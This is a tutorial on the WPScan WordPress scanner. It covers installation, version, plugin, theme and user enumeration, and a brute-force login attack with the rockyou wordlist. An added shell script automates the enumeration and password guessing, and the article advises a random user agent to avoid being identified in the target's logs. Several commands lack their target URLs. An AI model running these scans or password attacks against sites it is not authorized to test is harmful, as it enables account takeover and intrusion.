Find WordPress Security Vulnerabilities with WPScan

WPScan is a black box WordPress security scanner, free for non-commercial use, written for security professionals and site maintainers who want to test the security of their own WordPress installations.

In this article we install WPScan and walk through its most useful scans: a basic fingerprint, plugin and theme enumeration, user enumeration and a password attack. Let’s get started:

Table of Contents

  1. Installation
  2. Usage
  3. Examples

Installation

WPScan comes pre-installed in Kali Linux. On other distributions it can be installed either as a Ruby gem or from source. Run these commands to install WPScan:

# As a Ruby gem (build tools are needed for the native extensions)
sudo apt install patch build-essential zlib1g-dev liblzma-dev ruby-dev
sudo gem install nokogiri
sudo gem install wpscan

# Or, from source
git clone
cd wpscan/
bundle install && rake install


Usage

Type this command to list all available options:

wpscan -h

The output lists every option together with a short description of what it does.


Examples

Perform a basic scan of your website (WPScan fingerprints the WordPress version and main theme and reports interesting files and headers):

wpscan --url --rua

Here, --rua (short for --random-user-agent) makes WPScan send a randomly chosen User-Agent header instead of its default one, so the scan is not trivially identified as WPScan in the target’s logs.

Enumerate plugins and themes. The values ap and at mean "all plugins" and "all themes" (every one WPScan can detect, which is slow and noisy); vp and vt restrict the output to those with known vulnerabilities. Note that vulnerability details come from the wpscan.com database and are only returned when you pass an API token with --api-token; without one WPScan still lists what it finds but reports no vulnerabilities for it.

# plugins
wpscan --url --rua --enumerate ap

# themes
wpscan --url --rua --enumerate at

Enumerate usernames (WPScan collects them from author archive pages and the WordPress REST API, among other sources):

wpscan --url --rua --enumerate u

Perform a brute-force password attack: WPScan takes a password list with -P and a comma-separated list of usernames with -U. A suitable wordlist such as rockyou is shipped by the Kali/Debian wordlists package (or can be downloaded from GitHub). Only run this against sites you are authorized to test; every guess is a real login request and will appear in the target’s logs.

Install and unpack the password dictionary (the archive lives under /usr/share, so decompressing it in place needs root):

sudo apt install wordlists
ls /usr/share/wordlists/rockyou.txt.gz
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
ls -la /usr/share/wordlists/rockyou.txt

Run the attack (usernames are given as one comma-separated argument; WPScan chooses between the wp-login form and XML-RPC automatically, and --password-attack forces a particular method):

wpscan --url --rua -P /usr/share/wordlists/rockyou.txt -U admin,admin2
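The steps above combined into one script, as an added example that is not part of WPScan or of this article’s original commands. It assumes wpscan is on PATH, that the wordlists package put rockyou.txt.gz under /usr/share/wordlists, and that WPSCAN_API_TOKEN and WORDLIST are environment variables you set yourself; the helper names (join_users, prepare_wordlist, run_enum, run_attack) are this example’s own. It avoids two pitfalls from the commands above: it never needs sudo to unpack the wordlist, and it builds the -U argument in the comma-separated form WPScan expects.

```sh
#!/bin/sh
# wp-audit.sh: run the WPScan workflow from this article end to end.
# Added example, not part of WPScan; assumes `wpscan` is on PATH.
# Usage: ./wp-audit.sh https://target.example [user ...]
#   WPSCAN_API_TOKEN   optional wpscan.com token; without it no vulnerability data is returned
#   WORDLIST           password list (default: rockyou from the Kali/Debian wordlists package)
set -eu

# Join usernames with commas: wpscan -U expects "admin,admin2",
# not the shell-quoted, space-separated form "'admin', 'admin2'".
join_users() {
  out=""
  for u in "$@"; do
    out="${out:+$out,}$u"
  done
  printf '%s' "$out"
}

# Resolve a usable wordlist path. The Debian/Kali `wordlists` package ships
# /usr/share/wordlists/rockyou.txt.gz, which a normal user cannot decompress in
# place, so decompress into a per-user cache directory instead of using sudo.
# Plain (non-.gz) paths are returned unchanged. $2 overrides the cache dir.
prepare_wordlist() {
  src="$1"
  cache="${2:-${XDG_CACHE_HOME:-${HOME:-/tmp}/.cache}/wpscan-wordlists}"
  case "$src" in
    *.gz)
      mkdir -p "$cache"
      out="$cache/$(basename "$src" .gz)"
      [ -s "$out" ] || gzip -dc "$src" > "$out"
      printf '%s' "$out"
      ;;
    *)
      printf '%s' "$src"
      ;;
  esac
}

# Enumeration phase: vulnerable plugins (vp), vulnerable themes (vt), users (u).
# Results are written as JSON so that runs can be diffed over time.
run_enum() {
  url="$1"; outfile="$2"
  set -- --url "$url" --random-user-agent --enumerate vp,vt,u --format json --output "$outfile"
  if [ -n "${WPSCAN_API_TOKEN:-}" ]; then
    set -- "$@" --api-token "$WPSCAN_API_TOKEN"
  fi
  wpscan "$@"
}

# Password-attack phase against the supplied usernames.
run_attack() {
  url="$1"; wordlist="$2"; outfile="$3"; shift 3
  wpscan --url "$url" --random-user-agent -P "$wordlist" -U "$(join_users "$@")" \
         --format json --output "$outfile"
}

main() {
  url="$1"; shift
  outdir="wpscan-$(date +%Y%m%d-%H%M%S)"
  mkdir -p "$outdir"
  run_enum "$url" "$outdir/enum.json"
  if [ $# -gt 0 ]; then
    wl="$(prepare_wordlist "${WORDLIST:-/usr/share/wordlists/rockyou.txt.gz}")"
    run_attack "$url" "$wl" "$outdir/passwords.json" "$@"
  fi
  echo "results written to $outdir/"
}

# Run only when a target was given, so the file can also be sourced for its functions.
[ $# -eq 0 ] || main "$@"
```

Run it as `./wp-audit.sh https://target.example admin editor`; the user enumeration step is worth reading first, since the names it discovers are usually better -U candidates than a guessed list.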

That’s it. Thanks for reading.